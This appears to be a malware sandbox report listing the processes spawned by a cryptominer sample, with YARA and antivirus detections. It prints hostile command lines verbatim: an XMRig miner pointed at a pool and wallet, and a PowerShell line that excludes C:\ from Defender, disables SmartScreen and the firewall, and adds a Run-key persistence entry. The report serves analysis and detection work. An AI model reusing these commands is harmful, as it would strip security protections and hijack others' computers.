                                                                  Start time:03:58:18
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:7
                                                                  Start time:03:58:35
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\Systemd\mvsc32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline: --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
                                                                  Imagebase:0x7ff759560000
                                                                  File size:8295936 bytes
                                                                  MD5 hash:EAB270D7108D82EE602CE25C64A5740F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.457813764.00007FF75A065000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000000.440562976.00007FF75A065000.00000008.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000000.438260120.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000007.00000002.445162667.00007FF759B6C000.00000002.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                  • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: Joe Security
                                                                  • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\ProgramData\Systemd\mvsc32.exe, Author: ditekSHen
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Avira
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 71%, Virustotal, Browse
                                                                  • Detection: 31%, Metadefender, Browse
                                                                  • Detection: 69%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:8
                                                                  Start time:03:58:35
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:10
                                                                  Start time:03:58:36
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:12
                                                                  Start time:03:58:36
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\MicrosoftNetwork\System.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\MicrosoftNetwork\System.exe"
                                                                  Imagebase:0x140000000
                                                                  File size:3574272 bytes
                                                                  MD5 hash:F56E50F8EE4DFB577CBB3F53F42ED20C
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Antivirus matches:
                                                                  • Detection: 100%, Joe Sandbox ML
                                                                  • Detection: 21%, Virustotal, Browse
                                                                  • Detection: 26%, Metadefender, Browse
                                                                  • Detection: 58%, ReversingLabs
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:13
                                                                  Start time:03:58:36
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:moderate

                                                                  General

                                                                  Target ID:14
                                                                  Start time:03:58:37
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Target ID:15
                                                                  Start time:03:58:37
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:16
                                                                  Start time:03:58:37
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:17
                                                                  Start time:03:58:37
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:18
                                                                  Start time:03:58:38
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM mvsc32.exe /F
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:19
                                                                  Start time:03:58:38
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:20
                                                                  Start time:03:58:38
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:21
                                                                  Start time:03:58:39
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:22
                                                                  Start time:03:58:40
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:23
                                                                  Start time:03:58:41
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:24
                                                                  Start time:03:58:41
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:25
                                                                  Start time:03:58:41
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM mvsc32.exe /F
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:26
                                                                  Start time:03:58:41
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:28
                                                                  Start time:03:58:48
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000001C.00000002.511059177.00000000007EB000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000001C.00000003.467408909.0000000003101000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                  Antivirus matches:
                                                                  • Detection: 5%, Virustotal, Browse
                                                                  • Detection: 0%, Metadefender, Browse
                                                                  • Detection: 4%, ReversingLabs

                                                                  General

                                                                  Target ID:29
                                                                  Start time:03:58:49
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
                                                                  Imagebase:0x7ff620040000
                                                                  File size:447488 bytes
                                                                  MD5 hash:95000560239032BC68B4C2FDFCDEF913
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET

                                                                  General

                                                                  Target ID:30
                                                                  Start time:03:58:49
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:31
                                                                  Start time:03:58:51
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:32
                                                                  Start time:03:58:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\Systemd\mvsc32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline: --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
                                                                  Imagebase:0x7ff699710000
                                                                  File size:8295936 bytes
                                                                  MD5 hash:EAB270D7108D82EE602CE25C64A5740F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000000.476066900.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.488689886.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000002.499743340.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000020.00000000.473740757.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                  General

                                                                  Target ID:33
                                                                  Start time:03:58:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:34
                                                                  Start time:03:58:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\Systemd\mvsc32.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline: --url pool.hashvault.pro:80 --user 49QjFe3jmGzJUr9K1Uoax1gay6mESvcFjACYJVMPATBWWV5DJdoD4qgeQD3JrtmtqZJgDmHP1nvagRP3QRTZXUPWHP9F4cx --pass x
                                                                  Imagebase:0x7ff699710000
                                                                  File size:8295936 bytes
                                                                  MD5 hash:EAB270D7108D82EE602CE25C64A5740F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000000.474898368.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000000.478030671.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: PUA_Crypto_Mining_CommandLine_Indicators_Oct21, Description: Detects command line parameters often used by crypto mining software, Source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Florian Roth
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.498632171.00007FF699D1C000.00000002.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000002.502330836.00007FF69A215000.00000008.00000001.01000000.0000000A.sdmp, Author: Joe Security

                                                                  General

                                                                  Target ID:35
                                                                  Start time:03:58:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:36
                                                                  Start time:03:58:52
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:37
                                                                  Start time:03:58:53
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:38
                                                                  Start time:03:58:53
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:39
                                                                  Start time:03:58:53
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:40
                                                                  Start time:03:58:54
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\netsh.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
                                                                  Imagebase:0x7ff75dd50000
                                                                  File size:92672 bytes
                                                                  MD5 hash:98CC37BBF363A38834253E22C80A8F32
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:41
                                                                  Start time:03:58:54
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:42
                                                                  Start time:03:58:55
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K taskkill /IM mvsc32.exe /F && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:43
                                                                  Start time:03:58:55
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:44
                                                                  Start time:03:58:55
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:45
                                                                  Start time:03:58:56
                                                                  Start date:15/07/2022
                                                                  Path:C:\ProgramData\UpSys.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
                                                                  Imagebase:0x140000000
                                                                  File size:945944 bytes
                                                                  MD5 hash:EFE5769E37BA37CF4607CB9918639932
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002D.00000002.539280863.00000000007ED000.00000004.00000010.00020000.00000000.sdmp, Author: Florian Roth
                                                                  • Rule: MAL_Sednit_DelphiDownloader_Apr18_2, Description: Detects malware from Sednit Delphi Downloader report, Source: 0000002D.00000003.482650411.0000000003161000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth

                                                                  General

                                                                  Target ID:46
                                                                  Start time:03:58:56
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\taskkill.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:taskkill /IM mvsc32.exe /F
                                                                  Imagebase:0x7ff68b240000
                                                                  File size:94720 bytes
                                                                  MD5 hash:530C6A6CBA137EAA7021CEF9B234E8D4
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:47
                                                                  Start time:03:58:56
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:48
                                                                  Start time:03:58:56
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\cmd.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:"C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exit
                                                                  Imagebase:0x7ff6edbd0000
                                                                  File size:273920 bytes
                                                                  MD5 hash:4E2ACF4F8A396486AB4268C94A6A245F
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:50
                                                                  Start time:03:58:57
                                                                  Start date:15/07/2022
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff6406f0000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language

                                                                  General

                                                                  Target ID:52
